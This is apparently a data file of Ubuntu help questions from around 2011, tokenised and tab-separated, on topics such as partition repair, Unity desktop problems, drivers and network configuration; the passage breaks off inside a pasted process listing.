48717	how to manually fix a partition table ?	i recently had trouble with the mbr/partition table on my laptop . i managed to rebuild the partition table using testdisk , and install grub to get it booting properly again ( i 'm using a dual-boot with windows 7 ) . however , i can no longer run gparted properly as i get the error ca n't have a partition outside the disk ! . fdisk -l output looks like this : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x188f12a9 device boot start end blocks id system /dev/sda1 * 1 154 1228800 7 hpfs/ntfs/exfat /dev/sda2 154 13446 106775171 7 hpfs/ntfs/exfat /dev/sda3 13447 28745 122880000 83 linux /dev/sda4 28745 30402 13317664+ f w95 ext 'd ( lba ) /dev/sda5 28745 29127 3069944 82 linux swap / solaris /dev/sda6 29127 30402 10240000 7 hpfs/ntfs/exfat so the disk has 30401 cylinders , but sda6 ends at cylinder 30402 ; presumably that 's where the problem is . when i run testdisk it has the 6th partition ending at cylinder 30401 , but writing it to the partition table does not make any difference . is there an easy way to fix this ? i 've read elsewhere that i could fix this by manually editing the partition table , but i 'd like really specific instructions as i do n't really know much about this area !
48718	where to put the mbr	i have 2 separate hdds - one has win7 and the other has ubuntu 11.04 . when i installed ubuntu i placed the grub/mbr on the partition , not the device , is this why it will not boot into ubuntu ? can i easily copy the mbr to the device area or do i have to reinstall ? and educationally , why is there the option to use the partition if it does n't work ? thanks
48719	what podcast/streaming tools are available ?	i want to be able to do one or all of the followings : talk to my computer and be heard over a network ( crazy o.o ) live video streaming ( watch a video and share over network ) live audio streaming ( listen to song and share over network )
48720	how to enable password for screensaver and lock-screen shortcut ( when lock-screen icon icon already does )	i 'd like to be able to lock my screen consistently and require a password . pressing the 'lock ' icon on the panel at the top blanks the screen , and prompts me for a password to unlock pressing ctrl-alt-l blanks the screen , but does not require a password to unlock letting the screensaver activate does not require a password to unlock . any suggestions ? i 'm hoping i can change something so that any time the screen is locked in any manner it will require a password .
48724	apple magic trackpad freezes when i tap with 3 or more fingers	i bought an apple magic trackpad . the device is working out of the box on ubuntu 11.04 64bit . however , when i tap with 3 - or more - fingers the device stops working . it works again if i disconnect it and then connect it again . i 've tried touchegg but it did n't work . is there any solution to disable 3 or more fingers for tapping ?
48725	is there some kind of icon browser ?	when making a custom launcher , it is nice to have a matching icon for it from the default usr ubuntu directories . the problem that is : ubuntu seems to store icons in about 50 or more folders . browsing all of them in nautilus takes ages . so my question is : is there some kind of icon browser that shows an overview of all icons in /usr/share/icons/* ?
48729	sweet home 3d does n't start	i 've recently installed ubuntu 11.04 and downloaded the `` sweet home 3d '' program from the software center . it installed and it shows up as one of the applications when i search for it , but i can not get it to start at all . any idea how i can do this or if this is a known issue ? i am using a dell studio 15 1558 laptop and the fglrx driver for my ati graphics card . but i have a feeling that this problem has nothing to do with hardware or drivers . edit : this is what i get when i type 'sweethome3d ' in the terminal : zeiger @ ubuntu : ~ $ sweethome3d [ warning ] /usr/bin/sweethome3d : unable to locate /usr/lib/jvm/java-6-sun/jre/lib/javaws.jar in /usr/share/java exception in thread `` main '' java.lang.noclassdeffounderror : javax/jnlp/unavailableserviceexception caused by : java.lang.classnotfoundexception : javax.jnlp.unavailableserviceexception at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : com.eteks.sweethome3d.sweethome3d . program will exit . zeiger @ ubuntu : ~ $ and i installed sweethome3d using the ubuntu software center .
48732	how to use a compressed ramdisk ( ramzswap ) ? huge speed gain	since i do n't use my laptop 's cd-drive i want to put a small ( 8 gb ) ssd into the cd-drive slot ( i 'll use a caddy similar to this one ) . i want to use compressed btrfs on the ssd and put all the data on the big hdd . i want to avoid unnecessary spin-ups . i want the system to be fast ... i want to minimize wearing of the ssd . what tricks are there to use a compressed ramdisk wisely ( using but not overusing it ) ? how to enable it ? what values are sensible ? also see this post ( i split my questions up ) .
48733	possible/viable to make a btrfs raid between ssd and hdd ?	since i do n't use my laptop 's cd-drive i want to put a small ( 8 gb ) ssd into the cd-drive slot ( i 'll use a caddy similar to this one ) . i want to use compressed btrfs on the ssd and put all the data on the big hdd . is it viable to do a raid 1 with ssd and a same-size partition of the hdd ? maybe even remount the raid -o degraded after boot and spin down the hdd : - ) ?
48735	make curl download using non-privacy extension ipv6 address ?	i currently use net.ipv6.conf.all.use_tempaddr=2 to get ipv6 privacy addresses ( which have a random host part are and regenerated a couple times a day ) . i need dynamic dns because the computer is connected to different networks and that changes the network part of the address . i 'm using curl to download a dynamic dns url and want it to use the non-random address that uses my mac . how can i make curl prefer the non-privacy address ?
48739	how to install the newest gnome 2 global menu ?	i 'd like to install the newest version of gnome 2 global menu that is used in natty . but the only thing i could find was version 0.7.10 : http : //code.google.com/p/gnome2-globalmenu/downloads/list but this old version ca n't export firefox 4 menus . it was updated in 2010. : ( can i get that from natty ? how ?
48744	is there an application that automatically tests the system ?	the system testing that comes with ubuntu is cool , but it just takes an enormous amount of time to complete , and i just do n't have time to sit around pressing the `` test '' button . is there something that does the tests automatically ?
48746	how to configure shutdown tasks ?	i have a shell script i 'd like to run automatically every time i logout , shutdown or reboot . does anyone know where can i configure this in ubuntu 10.10 ?
48750	efficient use of run application dialog	in windows 7 , there appeared this beautiful search/run field : you press win , you start typing the program name , as soon as windows correctly guesses it , you press enter , and you 're done . in ubuntu , run application is a somewhat similar thing . you press alt+f2 , you start typing the command or the application name , ubuntu correctly guesses it ( puts it on top of the list of known applications ) ... however at this point you can not just press enter . you have to use a mouse or press tab 5 times . is there a way around ?
48752	how to maintain a patched upstream package	i 'm looking for the best way to maintain a patched version of an upstream ubuntu package . here 's the situation : we have our own server running reprepro , which would host the modified package . our other packages are managed using git and the git packaging tools ( git-dch , git-buildpackage ) . i have the .diff file that contains the patch to the upstream source , which i 've applied before by doing apt-get source pkgname , applying it and running debuild . i 'd like to track it properly this time using git . what 's the best process for managing this ?
48753	the colors on videos i watch are messed up - quite badly	this one really has me stumped . whenever i watch a video in totem or vlc , the colors are completely messed up . here is the preview of a video in nautilus and what it looks like in totem : some other helpful information : this does not happen for videos in the flash player . this happens for all video formats , including mpeg / wmv / etc . i am using ubuntu 11.04 64-bit with the nvidia driver 270.41.06 .
48759	alt key not registering as key ?	keyboard shortcuts that i 'm used to with alt on ubuntu are not working on my new system ( running 10.04 lts ) . alt+1 for first tab , for example . when i run xev i see that when i press alt instead of getting the keypress event that i normally expect i get this instead : focusout event , serial 36 , synthetic no , window 0x4c00001 , mode notifygrab , detail notifyancestor focusin event , serial 36 , synthetic no , window 0x4c00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 36 , synthetic no , window 0x0 , keys : 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 any idea what 's going on ? thanks .
48764	moving a window that i can not see	i am running natty narwhal on x86_64 with the new `` unity '' desktop . i have two monitors . well , make that one monitor and a high-def television set . i usually leave the tv off , or if it is on , it is usually set to display an input other than my ubuntu system . sometimes , when an application decides to open a window , it opens it on the secondary display ( i.e. , the tv ) . in earlier versions of ubuntu ( using gnome-desktop ) , i could right-click on the application in the task bar , select the name of the window , choose `` move '' , and drag it onto my primary display ( i.e. , the monitor ) . with natty , i have to turn on my television , wait for it to power up , set it to `` hdmi input # 3 '' ( or whatever ) , mouse over to the tv , grab the window , drag it back , restore my tv to its default input , and turn it off . i find this new process significantly less efficient than the old one . is there any way under unity to move a window that i can not see from one screen to another ? if not , how can i request this feature ? thanks .
48766	how can i encrypt the entire disk on alternate installation ?	is it possible to install ubuntu 11.04 with full disk encryption ? previously versions have had an alternate install cd with a text interface where you could enable encryption for your drives . this one is fully graphical and is missing that encryption option .
48767	installed eterm but it is not in my path	i 'm trying to install eterm on an instance of kubuntu . i sudo apt-get install eterm , and everything seems to go alright , but at the end there 's no eterm on my path . anyone know where the stuff got hidden so i can link the executable to somewhere on my path .
48768	shell script to restart a process if it outputs a certain piece of text	i have a python program which , from time to time , crashes with a number of different exceptions usually due to network issues . the only way to get it to work is to restart it . how would i write a shell script to run the process , continually check if any of the output says error and if so end the process and restart the command ( let 's call it ./command.sh ) ? it would be fine for this to be in any other language ( python/perl etc ) .
48771	how to set pressure sensitivity in gimp to control line thickness ?	my sister is moving from windows and i just got her a new graphics tablet . however , the pressure sensitivity controls opacity rather than line thickness ; she really needs this feature from photoshop/corel painter . is there a way to toggle on or off the pressure affecting either line opacity or thickness ?
48773	merging with notify-osd	i 've written a program that uses notify-osd but occasionally messages from my app will stack up in the queue . i 've read about notify-osd merging however , it does n't do this automatically - how can i get my application to merge notifications so they do n't stream in one at a time ?
48782	how do i ( manually ) install the java plugin in firefox4	i 'm trying to manually install the java plugin for firefox4 on maverick ( got ff4 from the ppa ) , but it seems the usual instructions do n't work . i 've tried doing both cd ~/.mozilla/plugins ln -s $ java_home/jre/lib/i386/libnpjp2.so . and cd /usr/lib/firefox ln -s $ java_home/jre/lib/i386/libnpjp2.so . but i still get the `` missing plugin '' warning in firefox . used to work fine for firefox 3.6 . also , after doing the first above chromium is able to pick up the java plugin without problems . in case it makes any difference i 'm running oracle 's `` vanilla '' jdk , not the ubuntu sun-java-6-bin package .
48784	how to sync ftp folder with local folder ?	i have a local folder , and i would like to sync it a folder on a web server via ftp . what is the best way to accomplish this ? i would prefer to be able to do this via terminal , so that i can just have an 'update ' command that would update the files on the sever .
48787	how can i connect my ti-84 plus calculator with my laptop ?	i want to connect my ti-84 plus to my ubuntu 11.04 laptop . i use the organelle cables to connect it . the program tilp ( 2 ) did n't work or at least it did n't show my ti-84 plus ; i 've tried to run it in root and in the normal way .
48788	desktop vanished in 11.04 update	my desktop has completely vanished as has my wall paper . i think there is some problem with the graphics driver , but natty and unity were working fine before this . managed to get a usable computer starting in 2d mode . as far as i can tell apps work .
48792	how to enable an extern keyboard using ps2 to usb adapter on a notebook ?	i have a laptop ( ibm t60 ) and i want to connect an extern keyboard to it . because the keyboard is a ps2 keyboard i bought a ps2 to usb adapter and plugged the keyboard into the adapter and the adapter to a usb slot on my laptop . but somehow the notebook does not recognize the keyboard . i even tryed a reboot while the keyboard was plugged in . do i have to `` mount '' the keyboard manually or something like that ?
48797	is unity 's dash supposed to go away when i click outside of it ?	when opening the dash with my super key and then deciding that i do not need the dash after all , i can dismiss it either by pressing the super key again or by hitting escape . the first thing that comes to my mind though is to click outside of the dash , but that does not do enything . is that intended behaviour ? update : this has been spurred by this bug : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/798642
48812	restore unity after fiddling with ccsm	i was happily using unity when i fiddled around with a setting on ccsm ( ccsm - > window management - > static application switcher ) . a confirmation box followed which said that the new setting would override an existing combination ( or something like that , not sure ) . and because i was not sure , i clicked on the close button on the top left instead of `` ignore '' or `` override '' options . this resulted in the top panel in unity to show incorrectly ( it did not disappear , but just showed random colours ) . so then i went to ccsm - > preferences - > profiles and unity was the profile that was already selected . i clicked on `` reset to defaults '' button just below the profile name . after this , the whole side bar and the top panel of unity has disappeared . i restarted the pc and it still did not appear . all i can do is press ctrl+alt+del ( that 's the only shortcut i know ) to restart the pc from unity . any idea on how to restore unity back to its original beauty ? thanks
48818	do n't load gnome at boot	i do not want the gnome to load when my ubuntu system starts , rather it just load the command line . in older versions of ubuntu i used to use the services utility to stop gdm from loading . how do i do this in 11.04 ?
48819	how do i recover a home directory after an upgrade ?	i had a home directory in ubuntu 10.04 called `` mtinsley '' . the account i setup while upgrading to 11 is `` mark '' . i wanted a new home so i could copy only what i wanted from my old home . now , i do not see any directories under home except : mark @ mounda : /home $ pwd /home mark @ mounda : /home $ sudo ls -la [ sudo ] password for mark : total 16 drwxr-xr-x 4 root root 4096 2011-06-10 20:57 . drwxr-xr-x 23 root root 4096 2011-06-10 21:10 .. drwxr-xr-x 3 root root 4096 2011-06-10 20:57 .ecryptfs drwx -- -- -- 27 mark mark 4096 2011-06-14 20:08 mark mark @ mounda : /home $
48820	does compiz support multipointer x ?	i know it supports touch , i 'm referring specifically to the ability to have more than one pointer ( cursor ) as an input . this was supposed to be complete by 0.9.4 but i 've not been able to find out if it is actually so . i 'm well aware that you can already have more than one pointer . i just want to know if compiz has fully formed support .
48822	is there a gui application for managing multiple mice/keyboards ?	i remember a few years ago seeing an application for fedora that allowed you to manage multiple mice or keyboards as separate input devices ( based on multipointerx technology ) . with this application you were able to tell the system to use two pointers ( for example if you have a mouse and a touchpad ) , and to handle them as separate devices instead of having the same settings ( i think ) for each . unfortunately this program never did compile/work for me when i tried it , and i do not remember the name ( nor have i been able to find it since then ) . does anyone know what i 'm referring to , or know of a program that does this ? p.s . ( i know how to use the xinput command already , so i do n't want a commandline application as a suggestion ) .
48823	how to make the script command append to a file ?	the script command typecasts the terminal activity to a particular file . i understood that part , but is there a way it can be made to append to an existing file ? the end goal for me is to make the script append the data to an existing file with a timestamp that is achieved by the date command . and ultimately have a launcher that pre-executes this upon its launch and i have a logfile of every output on my terminal . i think i have the puzzle solved except for making the script command append .
48826	unity wo n't load with proprietary drivers	first time running ubuntu 11.04 and getting used to unity , i decided to install proprietary drivers for my nvidia graphic card . the output of lspci | grep vga is : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 0df5 ( rev a1 ) if i activate the driver that is `` recommended '' , next time i try to login in a unity session it just changes to the classic . how can that be happening ? i attach the screenshoot of my proprietary driver screen :
48827	can the window controls ( max , min , close ) and the title be moved to the bottom ?	i know i can move them to the left or the right , even on the middle , but i 've never seen a window with it 's controls and title on the bottom instead on the top . is it even possible to ? like if i could make a emerald theme and put them there , or a metacity theme and do the same ? if emerald ormetacity ca n't do this , what about other window managers ?
48828	any way to automatically compress a .gif file ?	i have a 2.0 mb gif i want to make smaller , preferably by dropping some frames . is there a command line utility or a program that will do it for me automatically ? thanks .
48830	is there any utility to check whether my laptop battery is in healthy condition or not ?	is there any utility available on ubuntu to check whether laptop battery is in healthy condition or not ?
48835	interactive cpu governor ?	my processor is a core2duo 2.16 ghz ( macbook 4.1 ) but cpufreq only shows four governors : conservative ondemand powersave performance no shows interactive and userspace the governor that i 've always liked is interactive , inclusive is the one i use in my google nexus one , i 've always been successful is there any way to activate or select interactive as governor in ubuntu 11.04 ? greetings and thanks in advance
48838	can i remove windows vista from my notebook and only install ubuntu ?	i would like to remove windows vista from my notebook which is currently running a dual boot windows vista + ubuntu and use ubuntu as the only os . the notebook is unstable when running windows vista , because it shuts itself down without interaction . ubuntu works flawless on it . i 'm thinking to format the notebook . but , it is better for me to ubuntu only without windows vista ? please advise .
48844	how to find the pid of the process which has deleted a file ?	i am working on a project related to vm migration . sometimes the vm image will disappear and i just want to know who the culprit is . i tried strace on suspicious processes but to no avail .
48848	why ubuntu-desktop package is allways associated with pulseaudio ?	as my question above , i wandered why ubuntu-desktop package is always with full association with pulseaudio packagae ? why ca n't we erase pulseaudio without erase ubuntu-desktop too ?
48859	adding a new usb pci card	i 'm completely new to ubuntu . i 've installed xubuntu 11 on an old machine quite successfully and plugged a wireless dongle into one of its on board usb1.1 ports , giving me wireless internet without too much trouble . i 've now bought a usb 2.0 pci card and installed it , hoping that it would be picked up automatically on boot and i could connect via usb2.0 . unfortunately i think it 's not being recognised . i have the following outputs from lsusb and lspci : lsusb bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 050d:705a belkin components f5d7050 wireless g adapter v3000 [ ralink rt2573 ] bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub sudo lspci -v 00:0e.0 usb controller : nec corporation usb ( rev 43 ) ( prog-if 10 [ ohci ] ) subsystem : nec corporation hama usb 2.0 cardbus flags : medium devsel , irq 11 memory at ed000000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ 40 ] power management version 2 00:0e.1 usb controller : nec corporation usb ( rev 43 ) ( prog-if 10 [ ohci ] ) subsystem : nec corporation hama usb 2.0 cardbus flags : medium devsel , irq 11 memory at ec800000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ 40 ] power management version 2 00:0e.2 usb controller : nec corporation usb 2.0 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : nec corporation usb 2.0 flags : medium devsel , irq 9 memory at ec000000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : [ 40 ] power management version 2 can anyone please suggest how i can overcome this problem ? automatic detect/configure tools would be best , but i 'm prepared to edit config files if necessary . a google on 'linux + install new hardware ' was n't too illuminating , i apologize if this has been asked before . update doing a dmesg | grep ehci , gives a 'startup error -19 ' entry and 'usb bus 1 deregistered ' . googling for the 1st error gives lots of hits all related to problems with usb 2.0 and the kernel in 10.10. maybe it 's still a kernel problem with 11.04
48860	launch vim on specific monitor in dual screen setup	i 'm running ubuntu 10.04 lts with a dual screen setup . i have a launcher in my panel that starts up vim , and i always want it to start on the right monitor . is there something that i can add to the command line in the launcher to make that happen ? either a vim parameter , or some other non-vim-specific trick ? note that i do n't want all instances of vim to launch to the right monitor . for instance , if i start it from a terminal , i prefer to have it on the left , or whatever monitor my terminal was on . edit fwiw , i 'm using gnome , currently on version 2.30.2 .
48861	ctrl key is mapped to backtick ( ` ) , how can i fix this ?	i do n't know why it happens , but if i press the left ctrl the output is backtick ( ` ) . when i press the right ctrl the output is like ctrl+z . my keyboard layout is usa .
48862	open-source alternative to adobe indesign	there is some open-source software , similar to adobe indesign ? it would be awesome if it do exist ... i know all the others like inkscape , gimp , etc ... but for indesign i have none . could you give me one direction ?
48865	jni deleted accidentally	i am using ubuntu 10.04 . i 've accidentally deleted the jni folder in /usr/lib/ by using the root terminal . is there any way that i can reinstall these files ? , or should i reload ubuntu ? . i 've tried copying files from another laptop ( same make , configuration as mine ) but 2 files were not being copied .
48868	3d acceleration for intel corporation n10 family	i get an asus eeepc t101m ( with a rotating touch screen ) . i install ubuntu 11.4 and with additional packages from : http : //ppa.launchpad.net/plippo/t101mt/ubuntu all work fine ... except 3d acceleration . which video driver could i use ?
48871	can i search tomboy notes with dash ?	with gnome-do i could ! it 's very very useful for me , because tomboy is well integrated in ubuntu . why does n't dash have anything about this ?
48874	typematrix – colemak – norwegian layout . finding < and >	using latest ubuntu . switching to colemak using hotkey ( fn + f5 ) on typematrix 2030 . most of it works well , but i just ca n't find < and > . layout set to norwegian default on installation . i tried xkeycaps , but this seems to have been discontinued before the introduction of typematrix . how can i find them ? even better : is there a mapping of colemak on typematrix with norwegian layout similar to this one ?
48877	will libreoffice be more `` visually user friendly '' ?	i like libreoffice . it 's simple and we can done the work as we should . but , it 's my opinion that it is n't `` visually user friendly '' ... i 've seen some interesting mockups very cool indeed . however , as i 'm use it sometimes all day , maybe libreoffice team should takee care some other important aspects like design . it 's important though , at the moment libreoffice it 's similar than office 98 : d in terms of design and we are in xxist century . have you seen apple 's keynote for instance ? it 's simple , beautifull and visually friendly ! let 's think about that .
48882	unity application launchers are disappeared	once i 'm adding application launcher onto unity dock i expect it will be there as long as i want , but after the system restarted they 're just disappeared . what may cause the problem or what should i do to achieve my launchers to be in there ? sultan
48885	how can i configure an edge trigger on click ?	i would like to set my edge binding to require a click . for example , i currently have the corners of my screen trigger the `` scale '' plugin . i would like to set compiz so that i go to the corner and click to mouse to activate the scale plugin . i 've already tried to set the `` initiate window picker '' setting ( with the mouse icon ) to `` bottomleftedge '' and `` button1 '' , for example . why does n't this work ?
48886	how do i list the default installed packages ?	i am developing a offline installer for ubuntu all version . i need ubuntu 's default installed packages list . we can get installed packages list by command in ubuntu dpkg -- get-selected but is there any way to get this information from any server ( web server ) . any script to fetch any ubuntu version 's default installed packages list . i will give ubuntu version and script will fetch packages list . note : i need at least a server address . i can write script for this .
48888	why is rtkit-daemon eating 100 % of my cpu ?	i sometimes have an rtkit-daemon process eating 100 % of my cpu and making the system unresponsive . i reboot and things are fine after that . what is rtkit-daemon supposed to do and why would it be sometimes eating up 100 % of my cpu ?
48891	what 's supposed to happen to nfsv4 mounts when kerberos tickets expire ?	i 've got a bug report up on launchpad describing this issue in detail . see here : bug # 794112 the gist is that i 'm using ldap and kerberos to authenticate nfsv4 mounts on my clients according to a configuration described at http : //www.danbishop.org/2011/05/01/ubuntu-11-04-sbs-small-business-server-setup-part-3-openldap/ . the problem seems to be that when users go home for the night their kerberos tickets expire , and the client os gets thoroughly wedged on the missing nfs volume . from the client logs : `` jun 6 10:53:28 carina kernel : [ 47636.670075 ] error : state manager encountered rpcsec_gss session expired against nfsv4 server 192.168.0.2 . '' it 's hard for me to believe that such a common scenario should have to result in a cold reboot every morning . this absolutely ca n't be the intended behavior . does anybody have a clue what 's going on ? cheers !
48892	how to set an application to open in a certain position on the screen ?	say i wanted an application to open its window in the center of the screen instead of some inconvenient place like the top left ( i have a pretty big monitor , so i 'd have to raise my head . also , the glare from my windows bounces off there , too ) . is there something that i can edit which does this so that i wo n't need to drag it to the center every time i use it ?
48898	setting primary monitor for launcher on natty 11.04	i have a dual monitor setup . it runs ati drivers on natty 11.04 as stated in title . i 've got it to run dual monitors but i ca n't get my primary monitor to be set for the left monitor . any ideas on how i could do this ? there 's a thread regarding this topic but it 's regarding nvidia drivers : dual monitor unity launcher opening on wrong monitor . move left launcher to another monitor
48899	how do you change udev rules without restarting ( e.g . to change eth1 to eth0 ) ?	tldr ; how do you apply changes to /etc/udev/rules.d/70-persistent-net.rules without restarting ? ( see this documentation about ethernet interface logical names . ) long version : i have a bootable usb flash drive running an image made by remastersys of 11.04 . i want to be able to use this bootable usb drive to run a dhcp server from any computer . to do this , i have to assign a static ip address to eth0 in /etc/network/interfaces and reference eth0 in /etc/default/isc-dhcp-server . however , the network card is assigned ethx based on mac address , so this only works on the first computer where the usb flash drive is used -- each subsequent computer 's nic will be assigned to eth1 , eth1 , etc . it seems that there are two strategies that could work to solve this problem : dynamically rewrite /etc/network/interfaces and /etc/default/isc-dhcp-server based on the first ethx that comes up when you run ifconfig -- this should be whatever nic is actually in the computer . rewrite /etc/udev/rules.d/70-persistent-net.rules so that whatever mac address is assigned to the nic is named eth0 . i know i can do # 1 because changes to these files can be applied by restarting networking and isc-dhcp-server . however , # 2 seems cleaner to me as i believe the /etc/udev/rules.d/70-persistent-net.rules will build up a bunch of crud as this usb drive is used in different computers . any help would be appreciated .
48902	libreoffice page numbering	how can i add the page number in libreoffice so it appears from a specific page to another in the top right corner .
48903	how do i prevent kdm from starting at boot ?	i would like to stop kdm from starting when my computer boots up . is there a way to do that ? kdm is my only graphical login program , i do not use gdm or xdm .
48911	laptop monitor screen having edges around it	im new to ubuntu but not that much as im now almost 90 % used to it : - ) . my problem is that my laptop screen was fully utilised in the ubuntu 11.04 natty narwhal but after connecting it to a projector and making it display by setting at the monitor , now it has edges which are pising me off . please advice guys ?
48914	high cpu usage with team speak 3.0.0-rc2	the cpu usage is always around 40 percent . i use push-to-talk and i had uninstalled pulseaudio . now i use alsa . i do n't even have to connect to a server . by simply starting ts the cpu usage goes up 40 percent and stays there . the cpu usage of 3.0.0-rc1 [ build : 14468 ] is constantly 14 percent . this is the output of top , mpstat and ps aux while i am running ts3 ... of course : alexandros @ alexandros-laptop : ~ $ top top - 18:20:07 up 2:22 , 3 users , load average : 1.02 , 0.85 , 0.77 tasks : 163 total , 1 running , 162 sleeping , 0 stopped , 0 zombie cpu ( s ) : 5.3 % us , 1.9 % sy , 0.1 % ni , 91.8 % id , 0.7 % wa , 0.1 % hi , 0.1 % si , 0.0 % st mem : 2061344k total , 964028k used , 1097316k free , 69116k buffers swap : 3997688k total , 0k used , 3997688k free , 449032k cached pid user pr ni virt res shr s % cpu % mem time+ command 2714 alexandr 20 0 206m 31m 24m s 37 1.6 0:12.78 ts3client_linux 868 root 20 0 47564 27m 10m s 8 1.4 3:21.73 xorg 1 root 20 0 2804 1660 1204 s 0 0.1 0:00.53 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root rt 0 0 0 0 s 0 0.0 0:00.01 migration/0 4 root 20 0 0 0 0 s 0 0.0 0:00.45 ksoftirqd/0 5 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 7 root 20 0 0 0 0 s 0 0.0 0:00.08 ksoftirqd/1 8 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/1 9 root 20 0 0 0 0 s 0 0.0 0:01.17 events/0 10 root 20 0 0 0 0 s 0 0.0 0:00.81 events/1 11 root 20 0 0 0 0 s 0 0.0 0:00.00 cpuset 12 root 20 0 0 0 0 s 0 0.0 0:00.00 khelper 13 root 20 0 0 0 0 s 0 0.0 0:00.00 async/mgr 14 root 20 0 0 0 0 s 0 0.0 0:00.00 pm 16 root 20 0 0 0 0 s 0 0.0 0:00.00 sync_supers 17 root 20 0 0 0 0 s 0 0.0 0:00.00 bdi-default 18 root 20 0 0 0 0 s 0 0.0 0:00.00 kintegrityd/0 19 root 20 0 0 0 0 s 0 0.0 0:00.00 kintegrityd/1 20 root 20 0 0 0 0 s 0 0.0 0:00.05 kblockd/0 21 root 20 0 0 0 0 s 0 0.0 0:00.02 kblockd/1 22 root 20 0 0 0 0 s 0 0.0 0:00.00 kacpid 23 root 20 0 0 0 0 s 0 0.0 0:00.00 kacpi_notify 24 root 20 0 0 0 0 s 0 0.0 0:00.00 kacpi_hotplug 25 root 20 0 0 0 0 s 0 0.0 0:00.99 ata/0 26 root 20 0 0 0 0 s 0 0.0 0:00.92 ata/1 27 root 20 0 0 0 0 s 0 0.0 0:00.00 ata_aux 28 root 20 0 0 0 0 s 0 0.0 0:00.00 ksuspend_usbd 29 root 20 0 0 0 0 s 0 0.0 0:00.00 khubd alexandros @ alexandros-laptop : ~ $ mpstat linux 2.6.32-32-generic ( alexandros-laptop ) 16.06.2011 _i686_ ( 2 cpu ) 18:20:15 cpu % usr % nice % sys % iowait % irq % soft % steal % guest % idle 18:20:15 all 5,36 0,09 1,91 0,68 0,07 0,06 0,00 0,00 91,83 alexandros @ alexandros-laptop : ~ $ ps aux user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 2804 1660 ? ss 15:58 0:00 /sbin/init root 2 0.0 0.0 0 0 ? s 15:58 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s 15:58 0:00 [ migration/0 ] root 4 0.0 0.0 0 0 ? s 15:58 0:00 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s 15:58 0:00 [ watchdog/0 ] root 6 0.0 0.0 0 0 ? s 15:58 0:00 [ migration/1 ] root 7 0.0 0.0 0 0 ? s 15:58 0:00 [ ksoftirqd/1 ] root 8 0.0 0.0 0 0 ? s 15:58 0:00 [ watchdog/1 ] root 9 0.0 0.0 0 0 ? s 15:58 0:01 [ events/0 ] root 10 0.0 0.0 0 0 ? s 15:58 0:00 [ events/1 ] root 11 0.0 0.0 0 0 ? s 15:58 0:00 [ cpuset ] root 12 0.0 0.0 0 0 ? s 15:58 0:00 [ khelper ] root 13 0.0 0.0 0 0 ? s 15:58 0:00 [ async/mgr ] root 14 0.0 0.0 0 0 ? s 15:58 0:00 [ pm ] root 16 0.0 0.0 0 0 ? s 15:58 0:00 [ sync_supers ] root 17 0.0 0.0 0 0 ? s 15:58 0:00 [ bdi-default ] root 18 0.0 0.0 0 0 ? s 15:58 0:00 [ kintegrityd/0 ] root 19 0.0 0.0 0 0 ? s 15:58 0:00 [ kintegrityd/1 ] root 20 0.0 0.0 0 0 ? s 15:58 0:00 [ kblockd/0 ] root 21 0.0 0.0 0 0 ? s 15:58 0:00 [ kblockd/1 ] root 22 0.0 0.0 0 0 ? s 15:58 0:00 [ kacpid ] root 23 0.0 0.0 0 0 ? s 15:58 0:00 [ kacpi_notify ] root 24 0.0 0.0 0 0 ? s 15:58 0:00 [ kacpi_hotplug ] root 25 0.0 0.0 0 0 ? s 15:58 0:00 [ ata/0 ] root 26 0.0 0.0 0 0 ? s 15:58 0:00 [ ata/1 ] root 27 0.0 0.0 0 0 ? s 15:58 0:00 [ ata_aux ] root 28 0.0 0.0 0 0 ? s 15:58 0:00 [ ksuspend_usbd ] root 29 0.0 0.0 0 0 ? s 15:58 0:00 [ khubd ] root 30 0.0 0.0 0 0 ? s 15:58 0:00 [ kseriod ] root 31 0.0 0.0 0 0 ? s 15:58 0:00 [ kmmcd ] root 34 0.0 0.0 0 0 ? s 15:58 0:00 [ khungtaskd ] root 35 0.0 0.0 0 0 ? s 15:58 0:00 [ kswapd0 ] root 36 0.0 0.0 0 0 ? sn 15:58 0:00 [ ksmd ] root 37 0.0 0.0 0 0 ? s 15:58 0:00 [ aio/0 ] root 38 0.0 0.0 0 0 ? s 15:58 0:00 [ aio/1 ] root 39 0.0 0.0 0 0 ? s 15:58 0:00 [ ecryptfs-kthrea ] root 40 0.0 0.0 0 0 ? s 15:58 0:00 [ crypto/0 ] root 41 0.0 0.0 0 0 ? s 15:58 0:00 [ crypto/1 ] root 48 0.0 0.0 0 0 ? s 15:58 0:03 [ scsi_eh_0 ] root 50 0.0 0.0 0 0 ? s 15:58 0:00 [ scsi_eh_1 ] root 53 0.0 0.0 0 0 ? s 15:58 0:00 [ kstriped ] root 54 0.0 0.0 0 0 ? s 15:58 0:00 [ kmpathd/0 ] root 55 0.0 0.0 0 0 ? s 